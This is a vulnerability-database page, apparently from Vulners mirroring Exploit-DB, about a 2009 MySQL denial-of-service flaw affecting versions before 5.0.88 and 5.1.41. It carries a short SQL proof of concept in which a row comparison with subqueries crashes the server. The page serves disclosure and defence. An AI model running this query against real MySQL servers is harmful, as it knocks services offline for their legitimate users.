Lucene search

K

MySQL 6.0.9 - SELECT Statement WHERE Clause Sub-query Denial of Service

πŸ—“οΈΒ 23 Nov 2009Β 00:00:00Reported byΒ Shane BesterTypeΒ 
exploitdb
Β exploitdb
πŸ”—Β www.exploit-db.comπŸ‘Β 48Β Views

MySQL 6.0.9 - SELECT Statement WHERE Clause Sub-query Denial of Service vulnerabilit

Show more
Related
Code
source: https://www.securityfocus.com/bid/37297/info

MySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.

An attacker can exploit these issues to crash the application, denying access to legitimate users.

Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable. 

drop table if exists `t1`;
create table `t1`(`a` float);
insert into `t1` values (-2),(-1);
select  1 from `t1`
where
`a` <> '1' and not
row(`a`,`a`) <=>
row((select 1 from `t1` where 1=2),(select 1 from `t1`)) 
into @`var0`;

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
23 Nov 2009 00:00Current
7.4High risk
Vulners AI Score7.4
48
.json
Report